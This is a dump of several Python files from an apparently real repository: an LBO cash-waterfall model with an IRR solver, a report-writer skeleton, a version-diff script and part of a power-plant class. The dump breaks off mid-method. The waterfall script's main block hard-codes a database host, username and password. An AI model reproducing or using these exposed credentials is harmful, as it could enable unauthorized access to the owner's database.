def get_waterfall_from_xlsx():
    """Read the cash waterfall from the 'waterfall' sheet.

    Returns an ordered list of 'flow' namedtuples (level, sublevel,
    instrument, item, method, split, flag_cash, report_subtotal), one per
    waterfall step, starting at row 2, columns C..J.
    """
    #template is hard coded here
    path_data = str(Path(path).parent) + '/data/lbo/'
    wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
    ws = wb['waterfall']
    flow = namedtuple('flow', ('level, sublevel, instrument, item, method, split, flag_cash, report_subtotal'))
    waterfall = []
    row = 2
    while ws['a'+str(row)].value is not None:
        #scenario = ws['a' + str(row)].value
        #version = ws['b' + str(row)].value
        level = ws['c' + str(row)].value
        sublevel = ws['d' + str(row)].value
        instrument = ws['e' + str(row)].value
        item = ws['f' + str(row)].value
        method = ws['g' + str(row)].value
        split = ws['h' + str(row)].value
        flag_cash = ws['i' + str(row)].value
        report_subtotal = ws['j' + str(row)].value
        waterfall.append(flow(level, sublevel, instrument, item, method, split, flag_cash, report_subtotal))
        row += 1
    wb.close()
    return waterfall
def get_tax_register_from_xlsx():
    """Read fixed-asset records from the 'taxes' sheet.

    Returns a list of plain lists [entity, name, tax_life, convention,
    method, in_service_date, amount, description]; amounts are scaled to
    model units by the module global UNITS.
    """
    #template is hard coded here
    #returns a list of tax assets
    path_data = str(Path(path).parent) + '/data/lbo/'
    wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
    ws = wb['taxes']
    # namedtuple is declared but the plain-list form is appended below
    fixed_asset = namedtuple('fixed_asset', ('entity, name, tax_life, convention, method, in_service_date, amount, description'))
    register = []
    row = 2
    while ws['a'+str(row)].value is not None:
        entity = ws['a' + str(row)].value
        name = ws['b' + str(row)].value
        tax_life = ws['c' + str(row)].value
        convention = ws['d' + str(row)].value
        method = ws['e' + str(row)].value
        in_service_date = ws['f' + str(row)].value.date()
        amount = ws['g' + str(row)].value / UNITS
        description = ws['h' + str(row)].value
        #register.append(fixed_asset(entity, name, tax_life, convention, method, in_service_date, amount, description))
        register.append([entity, name, tax_life, convention, method, in_service_date, amount, description])
        row += 1
    wb.close()
    return register
def npv(irr, cfs, yrs):
    """Net present value of cash flows *cfs* occurring at year fractions
    *yrs*, discounted at rate *irr*. cfs/yrs are numpy arrays (or
    broadcast-compatible)."""
    return np.sum(cfs / (1. + irr)**yrs)
def irr(cfs, yrs, x0, **kwargs):
    """Internal rate of return: the rate at which npv(cfs, yrs) is zero.

    x0 is the solver's initial guess; extra kwargs pass through to fsolve.
    Returns a plain Python float.
    """
    # BUG FIX: np.asscalar was deprecated in NumPy 1.16 and removed in 1.23;
    # ndarray.item() is the supported replacement.
    return fsolve(npv, x0=x0, args=(cfs, yrs), **kwargs).item()
def required_return_payment(payment, payment_years, investment, irr, cfs, yrs):
    """Residual used to solve for the extra *payment* stream (at
    *payment_years*) needed to hit the target *irr* on *investment* given
    base cash flows *cfs* at *yrs*. Zero at the solution."""
    base_npv = npv(irr, cfs, yrs)
    payment_npv = npv(irr, payment, payment_years)
    return base_npv - investment + payment_npv
def convert_to_years(dividends, investment_date):
    """Convert dividend dates into year fractions since *investment_date*.

    dividends is an iterable of (amount, date) pairs; returns a list of
    floats (ACT/365) suitable for npv()/irr().
    BUG FIX: the original divided a timedelta by 365, producing timedelta
    objects that break the downstream (1 + irr) ** yrs arithmetic; use
    .days / 365 to get floats.
    """
    return [(dividend[1] - investment_date).days / 365 for dividend in dividends]
def load_instruments(scenario):
    """Instantiate the capital-structure objects described by *scenario*.

    scenario maps instrument name -> kwargs dict; each kwargs dict carries a
    'class' key naming a class in this module and a 'flag_include' switch.
    Returns {instrument name: instance} for the included instruments.
    """
    instruments = {}
    for name, kwargs in scenario.items():
        if kwargs['flag_include']:
            # look the class up by name in this module's globals
            instruments[name] = globals()[kwargs['class']](**kwargs)
    return instruments
def pari_passu(period, level, sublevel, cash, waterfall, instruments, output):
    """Distribute *cash* pro-rata across all waterfall rows that share
    (level, sublevel). Returns (remaining cash, output) with one output row
    appended per pari-passu item.
    """
    #identify sublist from portfolio.waterfall of items that are pari passu
    pari_items = []
    for flow in waterfall:
        if flow.level == level and flow.sublevel == sublevel:
            pari_items.append(flow)
    #cycle thru sublist with get_amount to determine total request
    cash_requested = 0.0
    for flow in pari_items:
        cash_requested += instruments[flow.instrument].get_amount(flow.item, period, cash)
    #calc pro-rata amount
    if cash_requested == 0.0:
        pro_ration = 1.0
    else:
        # NOTE(review): with negative (outflow) requests, max(..., 1.0) never
        # scales requests DOWN when cash is short -- confirm min() was not
        # intended here.
        pro_ration = max(cash / cash_requested, 1.0)
    #cycle thru sublist with set_amount
    for flow in pari_items:
        cash_flow = instruments[flow.instrument].get_amount(flow.item, period, cash)
        if flag_debug:
            print("{:,.2f}".format(cash), flow.instrument, flow.item, "{:,.2f}".format(cash_flow), 'pari passu')
        # NOTE(review): books via the module-level 'portfolio' instead of the
        # 'instruments' parameter passed in -- confirm intentional.
        portfolio.instruments[flow.instrument].set_amount(flow.item, period, cash_flow * pro_ration)
        cash += cash_flow * pro_ration
        output.append([period, flow.instrument, flow.item, cash, cash_flow * pro_ration, flow.level, flow.sublevel])
    #return remaining cash
    return cash, output
def calc_next_flow(level, sublevel, waterfall):
    """Return the (level, sublevel) of the first waterfall row after the
    run of rows matching (*level*, *sublevel*).

    Consecutive matching rows (pari-passu groups) are skipped as one unit.
    Returns (0, 0) when no such row exists.
    """
    seen_match = False
    for step in waterfall:
        if step.level == level and step.sublevel == sublevel:
            seen_match = True
        elif seen_match:
            # first row past the matching run
            return (step.level, step.sublevel)
    return (0, 0)
def run_waterfall(prepay_solver, portfolio):
    """Run the monthly cash waterfall over the portfolio's life.

    prepay_solver is a per-month list of candidate prepayments (one entry
    per month from close_date). Returns 'output': one row
    [period, instrument, item, cash, cash_flow, level, sublevel] per
    waterfall step executed. Sign convention: outflows negative.
    """
    #This is run to get the initial estimate of prepayments to feed the solver
    period = utils.calc_month_end(portfolio.close_date, 'date')
    month = 0
    periodicity_months = 1
    output = []
    excess_cash = []
    while period <= utils.calc_month_end(portfolio.terminal_date, 'date'):
        cash = 0.0
        if flag_debug:
            print(period)
        #first flow is always level 1, sublevel 1
        next_flow = (1,1)
        for flow_counter in range(len(portfolio.waterfall)):
            #note: cash outflows are negative, inflows positive
            flow = portfolio.waterfall[flow_counter]
            # only execute the step the cursor points at; pari-passu groups
            # are consumed in one call and skipped here via next_flow
            if (flow.level * 100 + flow.sublevel) == (next_flow[0] * 100 + next_flow[1]):
                if flow.method == 'normal':
                    #special case if calling portfolio-level function (necessary for ptd)
                    if flow.instrument == 'Portfolio':
                        cash_requested = portfolio.get_amount(flow.item, period, cash, prepay_solver)
                    else:
                        cash_requested = portfolio.instruments[flow.instrument].get_amount(flow.item, period, cash, prepay_solver[month])
                    if cash_requested >= 0:
                        cash_flow = cash_requested
                    else:
                        #cleanup items need to allow for negative cash flow. Will be zero when solution found
                        if flow.item in ['dsra cleanup', 'ptd cleanup']:
                            cash_flow = cash_requested
                        else:
                            # outflows are capped at available cash
                            cash_flow = max(cash_requested, -cash)
                    if flow.instrument == 'Portfolio':
                        portfolio.set_amount(flow.item, period, cash_flow)
                    else:
                        portfolio.instruments[flow.instrument].set_amount(flow.item, period, cash_flow)
                    output.append([period, flow.instrument, flow.item, cash, cash_flow, flow.level, flow.sublevel])
                    if flag_debug:
                        print("{:,.2f}".format(cash), flow.instrument, flow.item, "{:,.2f}".format(cash_flow), "{:,.2f}".format(portfolio.instruments['TLB'].principal))
                    if flow.flag_cash:
                        cash += cash_flow
                elif flow.method == 'pari passu':
                    cash, output = pari_passu(period, flow.level, flow.sublevel, cash, portfolio.waterfall, portfolio.instruments, output)
                else:
                    print('Error in main loop - unknown waterfall item')
                # advance the cursor past this step (and any pari-passu run)
                next_flow = calc_next_flow(flow.level, flow.sublevel, portfolio.waterfall)
        period = utils.calc_next_month_end(period, 'date')
        month += 1
    return output
def solve_waterfall(prepay_solver, portfolio):
    """Same monthly waterfall loop as run_waterfall, but returns the list of
    per-month leftover cash instead of the detailed output rows.

    Used as the residual inside waterfall_shell/fsolve: excess cash is zero
    at the solved prepayment vector.
    NOTE(review): this duplicates run_waterfall almost line-for-line;
    consider merging the two with a return-mode flag.
    """
    #This is run to get the initial estimate of prepayments to feed the solver
    period = utils.calc_month_end(portfolio.close_date, 'date')
    month = 0
    periodicity_months = 1
    output = []
    excess_cash = []
    while period <= utils.calc_month_end(portfolio.terminal_date, 'date'):
        cash = 0.0
        if flag_debug:
            print(period)
        #first flow is always level 1, sublevel 1
        next_flow = (1,1)
        for flow_counter in range(len(portfolio.waterfall)):
            #note: cash outflows are negative, inflows positive
            flow = portfolio.waterfall[flow_counter]
            if (flow.level * 100 + flow.sublevel) == (next_flow[0] * 100 + next_flow[1]):
                if flow.method == 'normal':
                    #special case if calling portfolio-level function (necessary for ptd)
                    if flow.instrument == 'Portfolio':
                        cash_requested = portfolio.get_amount(flow.item, period, cash, prepay_solver)
                    else:
                        cash_requested = portfolio.instruments[flow.instrument].get_amount(flow.item, period, cash, prepay_solver[month])
                    if cash_requested >= 0:
                        cash_flow = cash_requested
                    else:
                        #cleanup items need to allow for negative cash flow. Will be zero when solution found
                        if flow.item in ['dsra cleanup', 'ptd cleanup']:
                            cash_flow = cash_requested
                        else:
                            # outflows are capped at available cash
                            cash_flow = max(cash_requested, -cash)
                    if flow.instrument == 'Portfolio':
                        portfolio.set_amount(flow.item, period, cash_flow)
                    else:
                        portfolio.instruments[flow.instrument].set_amount(flow.item, period, cash_flow)
                    output.append([period, flow.instrument, flow.item, cash, cash_flow, flow.level, flow.sublevel])
                    if flag_debug:
                        print("{:,.2f}".format(cash), flow.instrument, flow.item, "{:,.2f}".format(cash_flow), "{:,.2f}".format(portfolio.instruments['TLB'].principal))
                    if flow.flag_cash:
                        cash += cash_flow
                elif flow.method == 'pari passu':
                    cash, output = pari_passu(period, flow.level, flow.sublevel, cash, portfolio.waterfall, portfolio.instruments, output)
                else:
                    print('Error in main loop - unknown waterfall item')
                next_flow = calc_next_flow(flow.level, flow.sublevel, portfolio.waterfall)
        # record this month's leftover cash (the solver residual)
        excess_cash.append(cash)
        period = utils.calc_next_month_end(period, 'date')
        month += 1
    return excess_cash
def create_portfolio():
    """Build a fresh Portfolio from the xlsx assumptions template.

    Attaches:
      cap_struct  - {instrument name: kwargs dict} from the template
      instruments - {instrument name: instantiated object}
      waterfall   - ordered list of 'flow' namedtuples (waterfall steps)
    """
    portfolio = Portfolio(**get_portfolio_from_xlsx())
    portfolio.cap_struct = get_cap_struct_from_xlsx()
    portfolio.instruments = load_instruments(portfolio.cap_struct)
    portfolio.waterfall = get_waterfall_from_xlsx()
    return portfolio
def waterfall_shell(prepay_solver):
    """fsolve objective: rebuild the portfolio, run the waterfall with the
    candidate prepayment vector, and return the per-month excess cash
    (all zeros at the solution). Prints/advances the global iteration
    counter on every call."""
    global COUNTER
    print(COUNTER)
    COUNTER += 1
    #if portfolio.flag_ptd:
    #    portfolio.calc_ptd()
    excess = solve_waterfall(prepay_solver, create_portfolio())
    # elapsed time since module start; kept only for ad-hoc debugging
    _elapsed = datetime.now() - START_TIME
    return excess
if __name__ == '__main__':
    #TODO: figure out global database access
    # SECURITY NOTE(review): database credentials are hard-coded in source;
    # move them to environment variables or a secrets store.
    HOST = 'kindledb.cfdmlfy5ocmf.us-west-2.rds.amazonaws.com'
    USER = 'Andrew'
    PASSWORD = 'Kindle01'
    DATABASE = 'kean'
    cnx = utils.generate_connection_instance(HOST, USER, PASSWORD, DATABASE)
    # NOTE(review): 'global' at module level is a no-op; these names are
    # module globals regardless.
    global START_TIME
    START_TIME = datetime.now()
    global UNITS
    UNITS = 1000000
    flag_debug = True
    #need global variable for scenario start and end dates
    #try:
    #    PORTFOLIO_START_DATE = portfolio.close_date
    #except:
    #    print("Error - no portfolio start date selected")
    #need global variable for yield curve date. attribute of Portfolio
    try:
        YIELD_CURVE_DATE = date(2019, 6, 26) #portfolio.yield_curve_date
        YIELD_CURVE_VERSION = 'v3' #portfolio.yield_curve_version
    except:
        #not using KEAN for libor curve
        pass
    #create prepay_solver
    # one entry per month from the first period through terminal_date
    prepay_solver = []
    period = date(2019, 6, 30)
    terminal_date = date(2020, 12, 31)
    #establish initial estimate of prepayments
    # can change value in 'if' portion of statement
    while period <= terminal_date:
        if period == date(2019, 6, 30):
            prepay_solver.append(0.0)
        else:
            prepay_solver.append(0.0)
        period = utils.calc_next_month_end(period, 'date')
    #below solver was attempt to speed up fsolve by using solution as first estimate, did not work
    #prepay_solver = [0,0,0,-30.2118,0,0,-19.4408,0,0,-69.8305,0,0,0,0,0,-24.4698,0,0,-10.0611]
    # first pass: run once to seed the solver with the TLB sweep amounts
    portfolio = create_portfolio()
    output = run_waterfall(prepay_solver, portfolio)
    #print('amortization ', portfolio.instruments['TLC'].amortization)
    #print('prepayments ', portfolio.instruments['TLC'].prepayments)
    #print('principal', portfolio.instruments['TLC'].principal, portfolio.instruments['TLC'].initial_balance)
    #sys.exit()
    df_output = pd.DataFrame(output, columns=['period', 'instrument', 'item', 'cash', 'cash_flow', 'level', 'sublevel'])
    criteria = ((df_output['item']=='sweep') & (df_output['instrument']=='TLB'))
    prepay_solver = df_output[criteria]['cash_flow'].tolist()
    #THIS IS WHERE THE MAGIC HAPPENS
    # solve for the prepayment vector that zeroes monthly excess cash
    COUNTER = 1
    portfolio = create_portfolio()
    solver = fsolve(waterfall_shell, prepay_solver)
    #save solver solution to csv file to use later in testing
    #with open('solver.csv', 'w', newline='') as myfile:
    #    wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
    #    wr.writerow(solver)
    # final pass: rerun the waterfall at the solution and report
    portfolio = create_portfolio()
    output = run_waterfall(solver, portfolio)
    df_output = pd.DataFrame(output, columns=['period', 'instrument', 'item', 'cash', 'cash_flow', 'level', 'sublevel'])
    #df_output.to_csv('lbo_output.csv')
    #create_lbo_support_report(portfolio)
    create_waterfall_report(df_output, portfolio.waterfall)
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,754 | changliukean/KEAN3 | refs/heads/master | /display/ReportWriter.py | import openpyxl as opx
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font
class Format:
    """Formatting spec for a rectangular worksheet range.

    Captures the inclusive (row, column) bounds plus the openpyxl style
    objects to apply. Defaults mirror openpyxl's own style defaults.
    NOTE(review): the default style objects are evaluated once at class
    definition and shared across instances - acceptable only while they are
    treated as immutable.
    """
    def __init__(self,
                start_row,
                start_column,
                end_row,
                end_column,
                font=Font(name='Calibri',size=11,bold=False,italic=False,vertAlign=None,underline='none',strike=False,color='FF000000'),
                fill=PatternFill(fill_type=None,start_color='FFFFFFFF',end_color='FF000000'),
                border=Border(left=Side(border_style=None,color='FF000000'),right=Side(border_style=None,color='FF000000'),
                    top=Side(border_style=None,color='FF000000'),bottom=Side(border_style=None,color='FF000000')),
                alignment=Alignment(horizontal='general',vertical='bottom',text_rotation=0,wrap_text=False,shrink_to_fit=False,indent=0),
                number_format='General'):
        self.startRow = start_row
        self.startColumn = start_column
        self.endRow = end_row
        self.endColumn = end_column
        # BUG FIX: the original assignments ended with trailing commas
        # ("self.font = font,"), silently wrapping each style in a 1-tuple.
        self.font = font
        self.fill = fill
        self.border = border
        self.alignment = alignment
        self.number_format = number_format
    def pack_format(self):
        #TODO implement serialization of this format spec
        pass
    def unpack_format(input_obj):
        # NOTE(review): missing 'self' - confirm this is meant to be a
        # @staticmethod before implementing.
        #TODO implement deserialization
        pass
class ReportWriter:
    """Skeleton report writer: holds a data matrix plus Format specs and the
    destination file path. write() is not yet implemented."""
    def __init__(self, output_filepath, data_matrix=None, formats=None):
        # BUG FIX: the original used mutable default arguments ([], []),
        # which are shared across every instance constructed without them.
        # Defaulting to None keeps callers backward-compatible.
        self.DataMatrix = data_matrix if data_matrix is not None else []
        self.Formats = formats if formats is not None else []
        self.outputFilepath = output_filepath
    def write(self):
        #TODO implement: render DataMatrix with Formats into the output file
        pass
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,755 | changliukean/KEAN3 | refs/heads/master | /lbo_diff.py | from utility.dispatchUtils import load_pp_tech_info, convert_uc_dataframe, load_solar_dispatch, load_nuclear_dispatch
from datetime import datetime, date
from database.dbPCUC import put_characteristics
from database.dbDispatch import put_dispatch, get_dispatch
from database.dbLBO import put_powerplant, put_technology, get_powerplants, get_technology, put_financials_lbo, get_financials_lbo, put_lbo_assumptions, get_lbo_assumptions,get_portfolio_with_powerplant,get_powerplants_by_portfolio
from database.dbScenarioMaster import insert_scenario_master, delete_scenario_master
from utility.lboUtils import read_excel_lbo_inputs
from lbo import lbo
from model.Entity import Powerplant
from model.Portfolio import Portfolio
from utility.dateUtils import get_month_list
import numpy as np
import sys
import pandas as pd
if __name__ == '__main__':
# portfolio = 'Norway'
# portfolio_obj = Portfolio('Norway')
# powerplant_df = get_powerplants_by_portfolio(portfolio)
""" diff report """
portfolio = 'Norway'
first_lbo_scenario = 'Norway'
first_lbo_version = 'v7'
second_lbo_scenario = 'Norway'
second_lbo_version = 'v6'
dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
first_lbo_financials_df = get_financials_lbo(portfolio, first_lbo_scenario, first_lbo_version)
second_lbo_financials_df = get_financials_lbo(portfolio, second_lbo_scenario, second_lbo_version)
lbo.write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df)
sys.exit()
portfolio = 'Vector'
first_lbo_scenario = 'Vector'
first_lbo_version = 'v12.2'
second_lbo_scenario = 'Vector'
second_lbo_version = 'v12'
dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
first_lbo_financials_df = get_financials_lbo(portfolio, first_lbo_scenario, first_lbo_version)
second_lbo_financials_df = get_financials_lbo(portfolio, second_lbo_scenario, second_lbo_version)
lbo.write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df)
# """ graphs output """
# portfolio = 'Vector'
# lbo_financials_scenario = 'Vector'
# lbo_financials_version = 'v7.1'
# lbo_graph_output_template = 'Dispatch Output_Graphs template.xlsx'
# lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
# lbo.write_lbo_graph_report('Dispatch Output_Graphs template.xlsx', lbo_financials_df)
# lbo_financials_df = get_financials_lbo(portfolio, lbo_financials_scenario, lbo_financials_version)
# dest_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\reports\\" + portfolio
#
# lbo.write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio)
# #
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,756 | changliukean/KEAN3 | refs/heads/master | /model/Entity.py | from database import dbPrices, dbLBO
import numpy as np
from datetime import datetime, date, timedelta
import pandas as pd
import sys
class Entity:
    """Minimal base for modeled entities: a display name plus a type tag
    (e.g. 'plant', 'holdco') that subclasses fix in their constructors."""

    def __init__(self, name, type):
        # Plain attribute storage; subclasses add everything else.
        self.name = name
        self.type = type
def get_match_signal(row):
    """Label a merged nodal/hub LMP row: 'Matched' when both price columns
    are present, 'Not matched' when either side is NaN."""
    either_missing = np.isnan(row['total_lmp_x']) or np.isnan(row['total_lmp_y'])
    return 'Not matched' if either_missing else 'Matched'
class Powerplant(Entity):
    """A generating asset: identity (market/node/hub), seasonal capacities and
    fuel basis, planned-outage windows, plus helpers to compute nodal basis
    against its hub and to persist itself to the LBO tables.

    Fixes vs. the previous version:
    - build_basis checked ``is None`` only *after* calling ``len()`` on the
      frames, so a None return from dbPrices raised TypeError before the guard
      could fire; the None check now comes first.
    - ``DataFrame.set_value`` (removed in pandas 1.0) replaced with ``.at``.
    - ``DataFrame.append`` (removed in pandas 2.0) replaced with ``pd.concat``.
    """

    def __init__(self, name, fuel_type, market, node, power_hub,
                 technology=None,
                 power_zone='',
                 power_hub_on_peak='',
                 power_hub_off_peak='',
                 fuel_zone='',
                 fuel_hub='',
                 summer_fuel_basis=0.0,
                 winter_fuel_basis=0.0,
                 summer_duct_capacity=0.0,
                 summer_base_capacity=0.0,
                 winter_duct_capacity=0.0,
                 winter_base_capacity=0.0,
                 first_plan_outage_start=date(1900, 1, 1),
                 first_plan_outage_end=date(1900, 1, 1),
                 second_plan_outage_start=date(1900, 1, 1),
                 second_plan_outage_end=date(1900, 1, 1),
                 carbon_cost=0.0,
                 source_notes='',
                 retirement_date=date(1900, 1, 1),
                 ownership=0.0):
        Entity.__init__(self, name, 'plant')
        # Either a Technology object or its name as a str (see save()).
        self.technology = technology
        self.fuelType = fuel_type
        self.market = market
        self.node = node  # power node name
        self.powerHub = power_hub  # power hub name
        self.powerZone = power_zone
        self.powerHubOnPeak = power_hub_on_peak
        self.powerHubOffPeak = power_hub_off_peak
        self.fuelZone = fuel_zone
        self.fuelHub = fuel_hub
        self.summerFuelBasis = summer_fuel_basis
        self.winterFuelBasis = winter_fuel_basis
        self.summerDuctCapacity = summer_duct_capacity
        self.summerBaseCapacity = summer_base_capacity
        self.winterDuctCapacity = winter_duct_capacity
        self.winterBaseCapacity = winter_base_capacity
        # date(1900,1,1) acts as the "no outage scheduled" sentinel.
        self.firstPlanOutageStart = first_plan_outage_start
        self.firstPlanOutageEnd = first_plan_outage_end
        self.secondPlanOutageStart = second_plan_outage_start
        self.secondPlanOutageEnd = second_plan_outage_end
        self.carbonCost = carbon_cost
        self.sourceNotes = source_notes
        self.retirementDate = retirement_date
        self.ownership = ownership

    def build_basis(self, start_date, end_date, dart, outlier_absolute_limit=0.5, replace_inf=np.nan):
        """Compute nodal-vs-hub basis ($ and %) from historical LMPs.

        Returns a (monthly on/off-peak mean basis df, merged hourly df) pair;
        both empty DataFrames when either price series is missing. Hourly
        basis values whose absolute percentage exceeds *outlier_absolute_limit*
        are dropped (set to NaN), and +/-inf is replaced with *replace_inf*.
        """
        nodal_lmp_df = dbPrices.get_historical_lmp(self.node, start_date, end_date, dart)
        hub_lmp_df = dbPrices.get_historical_lmp(self.powerHub, start_date, end_date, dart)
        # Guard against None *before* len()/print — the old ordering raised
        # TypeError on a None return before the guard could run.
        if nodal_lmp_df is None or hub_lmp_df is None:
            return pd.DataFrame(), pd.DataFrame()
        print("------------------------------------------------")
        print(self.market, self.node, len(nodal_lmp_df))
        print(self.market, self.powerHub, len(hub_lmp_df))
        if len(nodal_lmp_df) == 0 or len(hub_lmp_df) == 0:
            return pd.DataFrame(), pd.DataFrame()
        merged_hub_nodal_lmp_df = pd.merge(nodal_lmp_df, hub_lmp_df, on=['delivery_date', 'hour_ending'], how='inner')
        merged_hub_nodal_lmp_df['signal'] = merged_hub_nodal_lmp_df.apply(lambda row: get_match_signal(row), axis=1)
        merged_hub_nodal_lmp_df.rename(columns={'total_lmp_x': 'nodal_lmp', 'total_lmp_y': 'hub_lmp', 'peak_info_x': 'peak_info'}, inplace=True)
        merged_hub_nodal_lmp_df['month'] = merged_hub_nodal_lmp_df.apply(lambda row: row['delivery_date'].month, axis=1)
        merged_hub_nodal_lmp_df = merged_hub_nodal_lmp_df[['delivery_date', 'hour_ending', 'month', 'nodal_lmp', 'hub_lmp', 'signal', 'peak_info']]
        merged_hub_nodal_lmp_df['basis_$'] = (merged_hub_nodal_lmp_df['nodal_lmp'] - merged_hub_nodal_lmp_df['hub_lmp'])
        merged_hub_nodal_lmp_df['basis_%'] = (merged_hub_nodal_lmp_df['nodal_lmp'] - merged_hub_nodal_lmp_df['hub_lmp']) / merged_hub_nodal_lmp_df['hub_lmp']
        # Drop hours where the percentage basis is an outlier (both columns).
        merged_hub_nodal_lmp_df['basis_$'] = merged_hub_nodal_lmp_df.apply(lambda row: np.nan if abs(row['basis_%']) > outlier_absolute_limit else row['basis_$'], axis=1)
        merged_hub_nodal_lmp_df['basis_%'] = merged_hub_nodal_lmp_df.apply(lambda row: np.nan if abs(row['basis_%']) > outlier_absolute_limit else row['basis_%'], axis=1)
        merged_hub_nodal_lmp_df = merged_hub_nodal_lmp_df.replace([np.inf, -np.inf], replace_inf)
        merged_hub_nodal_lmp_df['plant'] = self.name
        monthly_onoffpeak_basis_df = merged_hub_nodal_lmp_df.groupby(['month', 'peak_info'])[['basis_$', 'basis_%']].mean()
        monthly_onoffpeak_basis_df['plant'] = self.name
        return monthly_onoffpeak_basis_df, merged_hub_nodal_lmp_df

    def save(self):
        """Persist this plant with slowly-changing-dimension semantics.

        Any record currently effective is closed out yesterday (or dropped if
        it only became effective today), then a fresh row effective
        today -> 2099-12-31 is appended and written via dbLBO.put_powerplant.
        """
        effective_end = date(2099, 12, 31)
        today_date = datetime.now().date()
        effective_start = today_date
        id_powerplant = []
